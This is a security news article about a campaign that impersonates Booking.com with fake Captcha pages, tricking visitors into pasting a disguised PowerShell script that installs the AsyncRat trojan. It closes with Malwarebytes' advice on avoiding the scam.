In a new campaign, cybercriminals disseminate malicious links on gaming sites and social media and even buy sponsored ads on search engines to trick users into opening fraudulent websites impersonating Booking.com.
Malwarebytes Labs is warning about users getting infected with AsyncRat, a backdoor remote access trojan (RAT) designed to monitor and control computers and gather sensitive and financial information, leading to financial damages and even identity theft.
The Cybercriminals abuse a well-documented Fake Captcha scheme, but a twist is that they impersonate Booking.com, one of the largest online travel agencies.
“Forty percent of people book travel through a general online search, creating a lot of opportunities for scammers,” the researchers explain in a report.
The campaign started in mid-May, and hackers rotate malicious links every two to three days.
If an unsuspecting victim clicks on an ad or a link elsewhere, the landing page first asks them to prove they’re not robots by performing a few simple steps.
However, the imposed instructions are designed to trick users into loading the malware themselves.
“By putting a checkmark in the fake Captcha prompt, you’re giving the website permission to copy something to your clipboard. Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals,” Malwarebytes warns.
Chrome may issue a warning that the fake website wants to see text and images copied to the clipboard, but it is vague and may be unclear to many users, as it doesn’t reflect the hacker’s intent.
So what’s happening behind the scenes?
The user launches a Run box and pastes a script into it. The script is disguised using mixed casing, quote interruption, and variable name manipulation, so the user won’t suspect anything. It then opens a hidden PowerShell window, downloads the RAT, and installs it.
Hackers have already been observed using at least 14 different website addresses in this campaign. Malwarebytes recommends never following suspicious instructions, especially those provided by websites visited without thought. Using an anti-malware solution and a browser extension that blocks domains and scams can help avoid the threat.
Booking.com is a frequently used lure by cybercriminals. Hackers also previously targeted hosts on the platform with credential-stealing malware, and launched phishing scams targeting hotel staff.
Your email address will not be published. Required fields are markedmarked